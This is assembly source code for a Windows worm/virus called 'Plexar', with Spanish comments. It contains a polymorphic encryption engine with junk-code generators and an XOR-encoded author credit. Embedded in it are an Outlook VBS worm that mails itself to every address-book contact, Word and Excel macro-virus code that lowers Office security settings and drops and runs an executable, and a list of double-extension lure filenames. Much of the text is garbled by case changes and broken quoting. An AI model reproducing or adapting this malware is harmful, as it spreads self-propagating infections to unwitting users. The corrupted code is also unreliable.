Rutina Para Revisar La EXISTENCIA DE UN Archivo.

EBX -> Nombre de Archivo.

; Retrna acarreo Si EXISTE

@Existe_archivo:

Push EBX

Push Page_Readwrite

PUSH MEM_COMMIT MEM_RESERVE MEM_TOP_DOWN

Push sizeof_win32_find_data

Push null

Apicall VirtualaLloc

Mov dwo [Vallocz], EAX

OR EAX, EAX

JZ @ea_negativo

POP EBX

Push EAX

Push EBX

Apicall FindfirstFilea

INC EAX

JZ @ea_negativo

Dec EAX

Push EAX

Apicall FindClose

Push Mem_Decommit

Push sizeof_win32_find_data

Push 12345678H

Org $ -4

Vallocz DD 00000000H

Apicall VirtualFree

STC

Ret 0

@Ea_negativo:

Push Mem_Decommit

Push sizeof_win32_find_data

Push dwo [Vallocz]

Apicall VirtualFree

CLC

Ret 0

WORM_VBS ENDP

Where is Xiyomira? Where is Xomotice? Where is Xomo?

DB "[" xor 40h

DB "D" xor 40h

DB "e" xor 40h

DB "s" xor 40h

DB "i" xor 40h

DB "g" xor 40h

DB "n" xor 40h

DB "e" xor 40h

DB "D" xor 40h

DB "" xor 40h

DB "B" xor 40hdb "y" xor 40h

DB "" xor 40h

DB "L" xor 40h

DB "i" xor 40h

DB "T" xor 40h

DB "e" xor 40h

DB "s" xor 40h

DB "y" xor 40h

DB "s" xor 40h

DB "]" xor 40h

DB 40h

Where is Xiyomira? Where is Xomotice? Where is Xomo?

PXPE: PLEXAR POLYMORPHIC ENGINE: Another Lame Poly Written By ME.

;

ESI -> Origen

EDI -> Destino

ECX -> TAMA 

PXPE PROC

Mov dwo [Origen], ESI

Mov dwo [destino], EDI

Mov dwo [tama], ECX

Call @INICIALIZAR_SEMILLAS

XOR EBX, EBX

Dec EBX

Call @aleatorio

MOV DWO [LLAVE], EAX

Mov EDI, DWO [Destino]

Delta

Push EDI

Call @basura

Call @basura

POP EDX

Sub EDX, EDI

Mov dwo [Guardadelta2], EDX

MOV Al, 0e8h; Call

Stosb

XOR Eax, Eax; Delta

Stosd

Call @basura

Call @basura

Call @popear_delta

Call @basura

Call @basura

Call @ meter_tama

Call @basura

Call @basura

Call @colocar_lea

Call @basura

Mov dwo [Guardaloop], EDI

Call @basura

MOV AX, 03781H; XOR DWORD PTR [EDI]

Stosw

Mov Eax, DWO [LLAVE]

Stosd

Call @basura

Call @basura

Call @sumacuatro

Call @basura

Call @basura

MOV Al, 049h

Stosb

MOV AX, 850FH

Stosw

Mov Eax, Dwo [Guardaloop]

Sub Eax, EDI

Sub eax, 04h

Stosd

Call @basura

Call @basura

Mov Eax, EDI

Sub eax, dwo [destino]

Sub Eax, 05H

MOV EBX, DWO [Guardadelta]

Sub DWORD PTR [EBX], EAX

Mov EDX, DWO [Guardadelta2]

Sub DWORD PTR [EBX], EDX

Mov ESI, DWO [Origen]

MOV ECX, DWO [Tama]

Mov Eax, DWO [LLAVE]

@Recopia:

Movsd

XOR DWORD PTR [EDI-4H], EAX

Loop @recopia

RET

@INICIALIZAR_SEMILLAS:

Lea Edi, OFS [@savesemilla]

RDTSC

Stosd

Push 04h

POP Edilea ESI, OFS [@savesemilla]

Call CRC32

Mov DWO [Semilla_1], EAX

Apicall gettickcount

Add Eax, EAX

NOT EAX; Que Mierda ...

Push 04h

POP EDI

Lea ESI, OFS [@savesemilla]

Call CRC32

Mov DWO [Semilla_2], EAX

RET

; Un Indecente Generador de Numeros Aleatorios ...

;

EBX -> Limite.

@Aleatorio:

Push EDI

Push ECX

Push Edx

Push EBX

Mov Eax, Dwo [Semilla_1]

Imul Eax, Mierda_1

Add Eax, Mierda_2

Mov DWO [Semilla_1], EAX

Lea edi, OFS [Milonga]

Stosd

MOV EBX, DWO [SEMILLA_2]

Imul EBX, MIERDA_3

Add ebx, Mierda_4

MOV DWO [Semilla_2], EBX

XCHG EAX, EBX

Stosd

Lea ESI, OFS [MILONGA]

Push 08h

POP EDI

Call CRC32

POP EBX

XOR EDX, EDX

Div EBX

XCHG EDX, EAX

POP EDX

POP ECX

POP EDI

RET

Milonga DB 9 DUP (00h)

@Popear_Delta:

Push 04h

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @Popear_Delta_i

CMP EAX, 01H

JZ @Popear_Delta_ii

CMP EAX, 02H

JZ @Popear_Delta_iii

CMP EAX, 03H

JZ @Popear_Delta_iv

JMP @Popear_Delta_iv

@Popear_Delta_r:

RET

@Popear_delta_i:

MOV Al, 05DH; POP EBP

Stosb

MOV AX, 0ED81H; SUB EBP

Stosw

Mov Dwo [Guardadelta], EDI

Mov Eax, DWO [Origen]

Stosd

JMP @Popear_Delta_r

@Popear_Delta_ii:

MOV Al, 058H

Stosb

MOV Al, 02DH

Stosb

Mov Dwo [Guardadelta], EDI

Mov Eax, DWO [Origen]

Stosd

Mov Al, 095H

Stosb

JMP @Popear_Delta_r

@Popear_Delta_iii:

MOV Al, 05BH

Stosb

MOV Al, 0BAH

Stosb

Mov Dwo [Guardadelta], EDI

Mov Eax, DWO [Origen]

Stosd

MOV AX, 0D329H

Stosw

MOV AX, 0DD87H

Stosw

JMP @Popear_Delta_r

@Popear_delta_iv:

MOV Al, 05ah

Stosb

MOV Al, 068H

Stosb

Mov Dwo [Guardadelta], EDI

Mov Eax, DWO [Origen]

Stosd

MOV Al, 05DH

Stosb

MOV AX, 0D587H

Stosw

MOV AX, 0D529H

Stosw

JMP @Popear_Delta_r

RET

@ Meter_tama:

Push 04h

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @ meter_tama_i

CMP EAX, 01H

JZ @ meter_tama_ii

CMP EAX, 02H

JZ @ meter_tama_iii

CMP EAX, 03H

JZ @ meter_tama_iv

JMP @ meter_tama_iii

@ Meter_tamar:

RET

@ Meter_tama_i:

MOV Al, 0B9H

Stosb

Mov Eax, Dwo [Tama]

Stosd

JMP @ meter_tamar

@ Meter_tama_ii:

MOV Al, 068H

Stosb

Mov Eax, Dwo [Tama]

Stosd

MOV Al, 059H

Stosb

JMP @ meter_tamar

@ Meter_tama_iii:

MOV Al, 0BAH

Stosb

Mov Eax, Dwo [Tama]

NOT EAX

Stosd

MOV AX, 0CA87H

Stosw

MOV AX, 0D1F7H

Stosw

JMP @ meter_tamar

@ Meter_tama_iv:

XOR EBX, EBX

Dec EBX

Call @aleatorio

XCHG EDX, EAX

MOV Al, 068H

Stosb

MOV EAX, EDX

Stosd

MOV Al, 058H

Stosb

MOV Al, 035H

Stosb

Mov Eax, Dwo [Tama]

XOR EAX, EDX

Stosd

MOV Al, 091H

Stosb

JMP @ meter_tamar

@Colocar_lea:

Push 03h

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @colocar_lea_i

CMP EAX, 01H

JZ @colocar_lea_ii

CMP EAX, 02H

JZ @colocar_lea_iii

JMP @colocar_lea_ii

@Colocar_lear:

RET

@Colocar_lea_i:

MOV AX, 0BD8DH

Stosw

Mov Eax, DWO [Origen]

Stosd

JMP @colocar_lear

@Colocar_lea_ii:

MOV Al, 0BFH

Stosb

Mov Eax, DWO [Origen]

Stosd

MOV AX, 0EF01H

Stosw

JMP @colocar_lear

@Colocar_lea_iii:

MOV Al, 068H

Stosb

Mov Eax, DWO [Origen]

Stosd

MOV Al, 05ah

Stosb

MOV AX, 0EA01H

Stosw

MOV AX, 0D787H

Stosw

JMP @colocar_lear

@Sumacuatro:

Push 04h

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @sumacuatro_i

CMP EAX, 01H

JZ @sumacuatro_ii

CMP EAX, 02H

JZ @sumacuatro_iii

CMP EAX, 03H

JZ @sumacuatro_iv

JMP @sumacuatro_iii

@Sumacuatror: Ret

@Sumacuatro_i:

MOV AX, 0C781H

Stosw

Mov Eax, 00000004H

Stosd

JMP @sumacuatror

@Sumacuatro_ii:

Mov Eax, 47474747h

Stosd

JMP @sumacuatror

@Sumacuatro_iii:

MOV Al, 47h

Stosb

MOV AX, 0C781H

Stosw

MOV EAX, 00000002H

Stosd

MOV Al, 47h

Stosb

JMP @sumacuatror

@SUMACUATRO_IV:

MOV AX, 0C781H

Stosw

MOV EAX, 00000003H

Stosd

MOV Al, 47h

Stosb

JMP @sumacuatror

General DE Basura! Mega Lameer !!!

@Basura:

Push 10D

POP ECX

@Basloop:

Push 08D

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @ Basura_1

CMP EAX, 1H

JZ @ Basura_2

CMP EAX, 2H

JZ @ Basura_3

CMP EAX, 3H

JZ @ Basura_4

CMP EAX, 4h

JZ @ Basura_5

CMP EAX, 5h

JZ @ Basura_6

CMP EAX, 6H

JZ @ Basura_7

JMP @ Basura_1

@Basura:

Loop @basloop

RET

@ Basura_1:

Push 07h

POP EBX

Call @aleatorio

Lea ESI, OFS [@ b1_tabla]

Add ESI, ESI

Movsb

XOR EBX, EBX

Dec EBX

Call @aleatorio

Stosd

JMP @basurar

@ B1_tabla:

DB 0B8H; MOV EAX

DB 0BBH; MOV EBX

DB 0BAH; MOV EDX

DB 0BEH; MOV ESI

DB 005H; Add Eax

DB 02DH; SUB EAX

DB 035H; XOR EAX

DB 015H; ADC EAX

@ Basura_2:

Push 15D

POP EBX

Call @aleatorio

Add Eax, EAX

Lea ESI, OFS [@ b2_tabla]

Add ESI, ESI

Movsw

XOR EBX, EBX

Dec EBX

Call @aleatorio

Stosd

JMP @basurar

@ B2_tabla:

DB 081H, 0C3H; Add EBX

DB 081H, 0C2H; Add Edx

DB 081H, 0C6H; Add ESI

DB 081H, 0EBH; SUB EBX

DB 081H, 0EAH; SUB EDX

DB 081H, 0EEH; SUB ESI

DB 081H, 0F6H; XOR ESI

DB 081H, 0F2H; XOR EDX

DB 081H, 0F3H; XOR EBX

DB 081H, 0D3H; ADC EBX

DB 081H, 0D2H; ADC EDX

DB 081H, 0D6H; ADC ESI

DB 069H, 0C0H; Imul Eax

DB 069H, 0DBH; Imul EBX

DB 069H, 0D2H; Imul EDXDB 069H, 0F6H; Imul ESI

@ Basura_3:

Push 35D

POP EBX

Call @aleatorio

Add Eax, EAX

Lea ESI, OFS [@ b3_tabla]

Add ESI, ESI

Movsw

JMP @basurar

@ B3_tabla:

DB 001H, 0D8H; Add Eax, EBX

DB 001H, 0D0H; Add Eax, EDX

DB 001H, 0F0H; Add Eax, ESI

DB 001H, 0D3H; Add EBX, EDX

DB 001H, 0F3H; Add EBX, ESI

DB 001H, 0C3H; Add EBX, EAX

DB 001H, 0DAH; Add Edx, EBX

DB 001H, 0F2H; Add Edx, ESI

DB 001H, 0C2H; Add Edx, EAX

DB 001H, 0DEH; Add ESI, EBX

DB 001H, 0D6H; Add ESI, EDX

DB 001H, 0C6H; Add ESI, EAX

DB 029H, 0D8H; SUB EAX, EBX

DB 029H, 0D0H; SUB EAX, EDX

DB 029H, 0F0H; SUB EAX, ESI

DB 029H, 0C3H; SUB EBX, EAX

DB 029H, 0D3H; SUB EBX, EDX

DB 029H, 0F3H; SUB EBX, ESI

DB 029H, 0C2H; SUB EDX, EAX

DB 029H, 0DAH; SUB EDX, EBX

DB 029H, 0F2H; SUB EDX, ESI

DB 029H, 0C6H; SUB ESI, EAX

DB 029H, 0DEH; SUB ESI, EBX

DB 029H, 0D6H; SUB ESI, EDX

DB 031H, 0D8H; XOR EAX, EBX

DB 031H, 0D0H; XOR EAX, EDX

DB 031H, 0F0H; XOR EAX, ESI

DB 031H, 0C3H; XOR EBX, EAX

DB 031H, 0D3H; XOR EBX, EDX

DB 031H, 0F3H; XOR EBX, ESI

DB 031H, 0C2H; XOR EDX, EAX

DB 031H, 0DAH; XOR EDX, EBX

DB 031H, 0F2H; XOR EDX, ESI

DB 031H, 0C6H; XOR ESI, EAX

DB 031H, 0DEH; XOR ESI, EBX

DB 031H, 0D6H; XOR ESI, EDX

@ Basura_4:

MOV Al, 068H; PUSH

Stosb

XOR EBX, EBX

Dec EBX

Call @aleatorio

Stosd

Push 03h

POP EBX

Call @aleatorio

Lea ESI, OFS [@ b4_tabla]

Add ESI, ESI

Movsb

JMP @basurar

@ B4_TABLA:

DB 058H; POP EAX

DB 05BH; POP EBX

DB 05AH; POP EDX

DB 05EH; POP ESI

@ Basura_5:

Push 11D

POP EBX

Call @aleatorio

Lea ESI, OFS [@ b5_tabla]

Add ESI, ESI

Movsb

JMP @basurar

@ B5_tabla:

DB 040H; Inc EAX

DB 043H; INC EBXDB 042H; Inc EDX

DB 046H; Inc ESI

DB 048H; DEC EAX

DB 04BH; DEC EBX

DB 04AH; DEC EDX

DB 04EH; DEC ESI

DB 093H; XCHG EBX, EAX

DB 092H; XCHG EDX, EAX

DB 096H; XCHG ESI, EAX

DB 093H; XCHG EBX, EAX

@ Basura_6:

Push 13D

POP EBX

Call @aleatorio

Lea ESI, OFS [@ b6_tabla]

Add Eax, EAX

Add ESI, ESI

Movsw

JMP @basurar

@ B6_tabla:

DB 0F7H, 0D0H; NOT EAX

DB 0F7H, 0D3H; NOT EBX

DB 0F7H, 0D2H; NOT EDX

DB 0F7H, 0D6H; NOT ESI

DB 0F7H, 0D8H; Neg Eax

DB 0F7H, 0DBH; Neg EBX

DB 0f7h, 0dah; Neg EDX

DB 0F7H, 0DEH; Neg ESI

DB 087H, 0DAH; XCHG EBX, EDX

DB 087H, 0DEH; XCHG EBX, ESI

DB 087H, 0D3H; XCHG EDX, EBX

DB 087H, 0D6H; XCHG EDX, ESI

DB 087H, 0F3H; XCHG ESI, EBX

DB 087H, 0F2H; XCHG ESI, EDX

@ Basura_7:

Push 31D

POP EBX

Call @aleatorio

Lea ESI, OFS [@ B7_TABLA]

Add Eax, EAX

Add ESI, ESI

Movsw

XOR EBX, EBX

Dec EBX

Call @aleatorio

Stosb

JMP @basurar

@ B7_TABLA:

DB 0C1H, 0D0H; RCL EAX

DB 0C1H, 0D3H; RCL EBX

DB 0C1H, 0D2H; RCL EDX

DB 0C1H, 0D6H; RCL ESI

DB 0C1H, 0D8H; RCR EAX

DB 0C1H, 0DBH; RCR EBX

DB 0C1H, 0DAH; RCR EDX

DB 0C1H, 0DEH; RCR ESI

DB 0C1H, 0C0H; ROL EAX

DB 0C1H, 0C3H; ROL EBX

DB 0C1H, 0C2H; ROL EDX

DB 0C1H, 0C6H; ROL ESI

DB 0C1H, 0C8H; ROR EAX

DB 0C1H, 0CBH; ROR EBX

DB 0C1H, 0CAH; ROR EDX

DB 0C1H, 0CEH; ROR ESI

DB 0C1H, 0E0H; SHL EAX

DB 0C1H, 0E3H; SHL EBX

DB 0C1H, 0E2H; SHL EDX

DB 0C1H, 0E6H; SHL ESI

DB 0C1H, 0F8H; SAR EAX

DB 0C1H, 0FBH; SAR EBX

DB 0C1H, 0FAH; SAR EDX

DB 0C1H, 0FEH; SAR ESI

DB 0C1H, 0E0H; SHL EAX

DB 0C1H, 0E3H; SHL EBX

DB 0C1H, 0E2H; SHL EDX

DB 0C1H, 0E6H; SHL ESI

DB 0C1H, 0E8H; SHR EAX

DB 0C1H, 0EBH; SHR EBX

DB 0C1H, 0EAH; SHR EDX

DB 0C1H, 0EEH; SHR ESI @ SAVESEMILLA DB 8 DUP (00h)

SEMILLA_1 DD 00000000H

SEMILLA_2 DD 00000000H

Llave DD 00000000H

Origen DD 0000000000H

Destino DD 00000000H

Tama  DD 00000000H

Guardadelta DD 00000000H

Guardadelta2 DD 00000000H

Guardaloop DD 00000000H

Mierda_1 EQU 1A7FC23BH

Mierda_2 EQU 000028B1H

Mierda_3 EQU 974D9DB5H

Mierda_4 EQU 0000F3C9H

PXPE ENDP

Where is Xiyomira? Where is Xomotice? Where is Xomo?

*********************************************************** *************

; * APLIB V0.22B - The Smaller The Better :) *

; * WASM & TASM Assembler Depacker *

; * *

; * CopyRight (c) 1998-99 by - Jibz - All Rights Reserved *

*********************************************************** *************

; .386p

; .Model flat

; .Code

PUBLIC _AP_DEPACK_ASM

_AP_DEPACK_ASM:

Push EBP

MOV EBP, ESP

Pushhad

Push EBP

Mov ESI, [EBP 8]; C Calling Convertion

Mov EDI, [EBP 12]

CLD

MOV DL, 80H

Literal:

Movsb

NextTAG:

Call getBit

JNC Literal

XOR ECX, ECX

Call getBit

JNC CodePair

XOR EAX, EAX

Call getBit

JNC Shortmatch

MOV Al, 10h

GetMorebits:

Call getBit

ADC Al, Al

JNC getMorebits

JNZ Domatch_with_inc

Stosb

JMP Short Nexttag

Codepair:

Call getgamma_no_ecx

Dec ECX

Loop NormalcodePair

MOV EAX, EBP

Call getgamma

JMP Short Domatch

Shortmatch:

Lodsb

SHR EAX, 1

JZ DoneDepacking

ADC ECX, 2

MOV EBP, EBP

JMP Short Domatch

NORMALCODEPAIR:

XCHG EAX, ECX

Dec EAX

SHL EAX, 8

Lodsb

MOV EBP, EBP

Call getgamma

CMP Eax, 32000

Jae Domatch_with_2inc

CMP EAX, 1280

Jae Domatch_with_inc

CMP EAX, 7FH

Ja Domatch

Domatch_with_2inc:

Inc ECX

Domatch_with_inc:

Inc ECX

Domatch:

PUSH ESI

MOV ESI, EDI

SUB ESI, EAX

REP MOVSB

POP ESI

JMP Short Nexttag

GetBit:

Add DL, DL

JNZ StillBitsLeft

MOV DL, [ESI]

Inc ESI

ADC DL, DL

STILLBITSLEFT:

RET

GETGAMMA:

XOR ECX, ECX

getGamma_no_ecx:

Inc ECX

getGammaloP:

Call getBit

ADC ECX, ECX

Call getBit

JC getGammaloP

RET

DONEDEPACKING:

POP EBP

SUB EDI, [EBP 12]

MOV [EBP - 4], EDI; RETURN UNPACKED Length in EAX

Popad

POP EBP

RET

Where is Xiyomira? Where is Xomotice? Where is Xomo?

Billy BelceBu's CRC32 Calculator.

;

CRC32 Procedure

; --------------

;

Input:

ESI = Offset Where Code to Calculate Begins

EDI = SIZE OF THAT CODE

Output:

EAX = CRC32 of Given Code

;

CRC32 PROC

CLD

XOR ECX, ECX; Optimized by me - 2 bytes

DEC ECX; Less

MOV EDX, ECX

Nextbytecrc:

XOR EAX, EAX

XOR EBX, EBX

Lodsb

XOR Al, Cl

MOV CL, CH

MOV CH, DL

MOV DL, DH

MOV DH, 8

NextbitCrc:

SHR BX, 1

RCR AX, 1

JNC NOCRC

XOR AX, 08320H

XOR bx, 0edb8h

NOCRC: DEC DH

JNZ nextbitCrc

XOR ECX, EAX

XOR EDX, EBX

Dec EDI; 1 byte Less

Jnz nextbytecrc

Not Edx

NOT ECX

MOV EAX, EDX

ROL EAX, 16

MOV AX, CX

RET

CRC32 ENDP

Where is Xiyomira? Where is Xomotice? Where is Xomo?

Generador de Numeros Aleatorios Para USo General.

;

EBX -> Limite Superior

Random Proc

PUSH ECX EDX EDI EBX

Lea Edi, OFS [Mariconada]

RDTSC

Stosd

Push 04h

POP EDI

Lea ESI, OFS [Mariconada]

Call CRC32

XCHG EDX, EAX

Push Edx

Lea Edi, OFS [Mariconada]

Apicall gettickcount

Stosd

Sub EDI, 04H

XCHG EDI, ESI

Push 04h

POP EDI

Call CRC32

POP EDX

Push EAX

OR EAX, EDX

POP ECX

And EDX, ECX

XOR EAX, EDX

POP EBX

XOR EDX, EDX

Div EBX

XCHG EDX, EAX

POP EDI EDX ECX

RET

Mariconada DB 9 DUP (00h)

Random ENDP

Where is Xiyomira? Where is Xomotice? Where is Xomo?

Tabla!

;

Create -> 01H

File -> 02h

Map -> 03H

View -> 04h

; Close -> 05H

Get -> 06h

; Set -> 07h; find -> 08h

Virtual -> 09h

WINDOW -> 0ah

; Directory -> 0bh

Current -> 0ch

Waitfor -> 0DH

; Thread -> 0eh

HThread DD 0000000000h

APIS_K32 DB 01H, 02H, "A", 00h

DB 01H, 02H, 03H, "PINGA", 00h

DB 03H, 04H, "Of", 02H, 00h

DB "unmap", 04h, "of", 02h, 00h

DB 05H, "Handle", 00h

DB 06H, 02H, "SIZE", 00h

DB 07H, 02H, "Pointer", 00h

DB 07H, "Endof", 02H, 00h

DB 07H, 02H, "Attributesa", 00h

DB "WRITE", 02H, 00h

DB 08H, "first", 02h, "a", 00h

DB 08H, "Next", 02H, "a", 00h

DB 08H, 05H, 00h

DB 09H, "Alloc", 00h

DB 09H, "Free", 00h

DB 06H, 0ah, "s", 0bh, "a", 00h

DB 06H, 0CH, 0BH, "a", 00h

DB 07H, 0CH, 0BH, "a", 00h

DB 01H, 0EH, 00H

DB "exit", 0eh, 00h

DB 0DH, "MultipleObjects", 00h

DB 0DH, "SINGLEOBJECT", 00h

DB 06H, "Tickcount", 00h

DB "LoadLibrarya", 00h

DB "delete", 02h, "a", 00h

DB 07H, 0EH, "priority", 00h

DB 0FFH

CreateFilea DD 00000000H

CreateFilemappinga DD 00000000H

MapViewOffile DD 00000000H

UnmapViewoffile DD 00000000H

CloseHandle DD 0000000000h

GetFileSize DD 00000000H

SetFilePointer DD 00000000h

STENDOFFILE DD 00000000H

SetFileAttributesa DD 00000000H

Writefile DD 00000000H

Findfirstfilea DD 00000000H

FINDNEXTFILEA DD 00000000H

FindClose DD 00000000H

Virtualalloc DD 00000000H

VirtualFree DD 00000000H

GetWindowsDirectorya DD 00000000H

GetCurrentDirectorya DD 00000000h

SetCurrentDirectorya DD 00000000H

CreateThread DD 00000000H

Exitthread DD 00000000H

WaitFormultiPleObjects DD 00000000H

WaitforsingleObject DD 00000000HgettickCount DD 00000000H

Loadlibrarya DD 00000000H

Deletefilea DD 00000000H

SetthreadPriority DD 00000000H

KERNEL32 DD 00000000H

Thread_directa DD 00000000H

Thread_Wormvbs DD 00000000H

Thread_iWord DD 00000000H

Thread_host DD 00000000H

Listo_directa db 00h

GetProcaddress DD 00000000H

Exports DD 00000000H

CRC32_GETPROCADDRESS EQU 0FFC97C1FH

L_GetProcaddress EQU 0FH

Scriptum DD 00000000H

Guardanom DD 00000000H

Largovbs DB 00H

Fhandle_WVBS DD 00000000H

MHANDLE_WVBS DD 00000000H

BaseMap_WVBS DD 00000000H

Gusano_vbs label ner

DB 'on Error Resume Next', 0DH, 0AH

DB 'Set Outlook = CreateObject ("Outlook.Application")', 0DH, 0AH

DB 'IF (Outlook <> ") Then', 0DH, 0AH

DB 'with Outlook', 0DH, 0AH

DB 'set mapi = .GETNAMESPACE ("MAPI")', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'with MAPI', 0DH, 0AH

DB 'set addrlist = .addresslists', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'for i = 1 to addrlist.count', 0DH, 0AH

DB 'with Outlook', 0DH, 0AH

DB 'set nuevomail = .createItem (0)', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'set libroactual = addrlist.Item (i)', 0DH, 0AH

DB 'with Nuevomail', 0DH, 0AH

DB '.attachments.add "'

L_gusano_vbs Equ $ -gusano_vbs

Gusano_vbs2 label Near

DB '", 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'Set Yuca = Libroactual.addressentries', 0DH, 0AH

DB 'with yuca', 0DH, 0AH

DB 'for j = 1 to .count', 0DH, 0AH

DB 'with Nuevomail', 0DH, 0AH

DB 'set bajo = .recipients', 0DH, 0AH

DB 'Bajo.add Yuca (j), 0DH, 0AHDB' end with ', 0DH, 0AH

DB 'next', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'with Nuevomail', 0DH, 0AH

DB '.send', 0DH, 0AH

DB 'end with', 0DH, 0AH

DB 'next', 0DH, 0AH

DB 'Outlook.quit', 0DH, 0AH

DB 'end, 0DH, 0AH

L_gusano_vbs2 Equ $ -gusano_vbs2

Nombres_varios DB "xd", 00h

DB "Sex.jpg", 20D DUP (""), ".exe", 00h

DB "Porno.gif", 20D DUP (")," .exe ", 00h

DB "free_xxx.jpg", 20D DUP (""), ".exe", 00h

DB "Great_Music.mp3", 20D DUP (""), ".exe", 00h

DB "Check_This.jpg", 20D DUP (""), ".exe", 00h

DB "COOL_PICS.GIF", 20D DUP (""), ".exe", 00h

DB "Love_Story.html", 20D DUP (""), ".exe", 00h

DB "sexy_screensaver.scr", 00h

DB "free_love_screensaver.scr", 00h

DB "eat_my_shorts.scr", 00h

Raxelp_vbs db "raxelp.vbs", 00h

WScript_exe DB "WScript.exe", 00h

Tabla_hex db "0123456789abcdef", 00h

FHANDLE_IW DD 00000000H

MHANDLE_IW DD 00000000H

Basemap_iw dd 00000000h

Tama_iw DD 00000000H

Memoria_iw DD 00000000H

Macaco DB 13D DUP (00h)

Virus_Macro Label Near

DB 'Attribute VB_Name = "plexar", 0DH, 0AH

DB 'SUB AUTO_OPEN (), 0DH, 0AH

DB 'Application.OnSheetActivate = "Infxl", 0DH, 0AH

DB 'End Sub', 0DH, 0AH

DB 'SUB INFXL ()', 0DH, 0AH

DB 'on Error Resume Next', 0DH, 0AH

DB 'set awo = application.activeworkbook', 0DH, 0AH

DB 'set vbp = application.vbe.activevbproject', 0DH, 0AH

DB 'set axo = awo.vbproject.vbcomponents, 0DH, 0AH

DB 'set vbx = vbp.vbcomponents, 0DH, 0AH

DB 'with application: .screenupdating = not-1: .displaystatusbar = not -1: .EnableCanceLKey = NOT-1: .displayalerts = not -1: end with', 0DH, 0AH

DB 'zzz = "plexar": xxx = "C: YYY = Application.startuppath &" /personal.xls ", 0DH, 0AH

DB 'vbx.item (zzz). EXPORT XXX', 0DH, 0AH

DB 'if Axo.item (zzz) .name <> zzz kiln, 0DH, 0AH

DB 'Axo.import xxx: awo.saveas awo.fullname', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'IF (Dir (YYY) = "") Then', 0DH, 0AH

DB 'Workbooks.add.saveas YYY', 0DH, 0AH

DB 'set awo = application.activeworkbook', 0DH, 0AH

DB 'set axo = awo.vbproject.vbcomponents, 0DH, 0AH

DB 'Axo.import XXX', 0DH, 0AH

DB 'ActiveWindow.visible = NOT -1', 0DH, 0AH

DB 'Workbooks ("Personal.xls"). Save', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'Kill XXX', 0DH, 0AH

DB 'Call Correme', 0DH, 0AH

DB 'End Sub', 0DH, 0AH

DB 'SUB AutoClose (), 0DH, 0AH

DB 'on Error Resume Next', 0DH, 0AH

DB 'zzz = "plexar": xxx = "C: / PLX. $$$", 0DH, 0AH

DB 'System.PrivateProfileString ("", "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 9.0 / Word / Security", "Level") = "1", 0DH, 0AH

DB 'System.PrivateProfileString ("," HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 8.0 / Word / Security "," Level ") =" 1 ", 0DH, 0AH

DB 'with options: .virusprotection = (2 * 4 4/6 - 2): .confirmconversions = (2 * 4 4/6 - 2): End with', 0DH, 0AHDB 'with Application: .displayStatusbar = ( 2 * 4 4/6 - 2): End with ', 0DH, 0AH

DB 'set akt = vbe.activevbproject.vbcomponents, 0DH, 0AH

DB 'set nox = normaltemplate.vbproject.vbcomponents', 0DH, 0AH

DB 'set dox = activeDocument.vbproject.vbcomponents, 0DH, 0AH

DB 'Akt.Item (zzz). EXPORT XXX', 0DH, 0AH

DB 'IF (Nox.Item (zzz) .Name <> zzz) Then', 0DH, 0AH

DB 'NOx.Import XXX', 0DH, 0AH

DB 'NORMALTEMPLATE.SAVE', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'IF (DOX.Item (zzz) .Name <> zzz) Then', 0DH, 0AH

DB 'Dox.Import XXX', 0DH, 0AH

DB 'ActiveDocument.saveas ActiveDocument.FullName', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'Kill XXX', 0DH, 0AH

DB 'Call Correme', 0DH, 0AH

DB 'End Sub', 0DH, 0AH

DB 'Private Sub Correme (), 0DH, 0AH

DB 'on Error Resume Next', 0DH, 0AH

DB 'DIM JODA AS STRING', 0DH, 0AH

DB 'DIM X AS String', 0DH, 0AH

DB 'JODA = "'

L_virus_macro Equ $ -virus_macro

Virus_macro_2 label Near

DB 'for o = 1 to Len (JODA) Step 2', 0DH, 0AH

DB 'x = x chr ("& H" MID (JODA, O, 2))', 0DH, 0AH

DB 'next', 0DH, 0AH

DB 'RAXNAME = Environ ("WINDIR") & "/Raxelp.exe", 0DH, 0AH

DB 'Open RaxName for Binary AS # 1', 0DH, 0AH

DB 'Put # 1, 1, x $', 0DH, 0AH

DB 'Close # 1', 0DH, 0AH

DB 'XOXO = shell (raxname, 0)', 0DH, 0AH

DB 'End Sub', 0DH, 0AH

L_virus_macro_2 EQU $ -Virus_macro_2nihil db 00h

Memoria DD 00000000H

Raxelp _ $$$ DB "C: / Raxelp. $$$", 00h

PLXWRD_VBS DB "PLXWRD.VBS", 00h

Macro_vbs label ner

DB 'on Error Resume Next', 0DH, 0AH

DB 'set word = creteObject ("word.application")', 0DH, 0AH

DB 'IF (Word <> ") Then', 0DH, 0AH

DB 'Word.System.PrivateProfileString ("", "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 9.0 / Word / Security", "Level") = "1", 0DH, 0AH

DB 'Word.System.PrivateProfileString ("", "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 8.0 / Word / Security", "Level") = "1", 0DH, 0AH

DB 'set min = word.application.normaltemplate.vbProject.vbcomponents', 0DH, 0AH

DB 'IF Maca.Item ("plexar"). Name <> "Plexar" Ten', 0DH, 0AH

DB 'Maca.import "C: / Raxelp. $$$", 0DH, 0AH

DB 'Word.Application.NORMALTEMPLATE.SAVE', 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'end, 0DH, 0AH

DB 'set fso = creteObject ("scripting.filesystemobject")', 0DH, 0AH

DB 'Set Excel = CreateObject ("Excel.Application")', 0DH, 0AH

DB 'IF (Excel <> ") Then', 0DH, 0AH

DB 'YYY = Excel.Application.Startuppath & "/personal.xls"', 0DH, 0AH

DB 'IF (fso.fileexists (yyy) = false) Then', 0DH, 0AH

DB 'Excel.Workbooks.add.saveas YYY', 0DH, 0AH

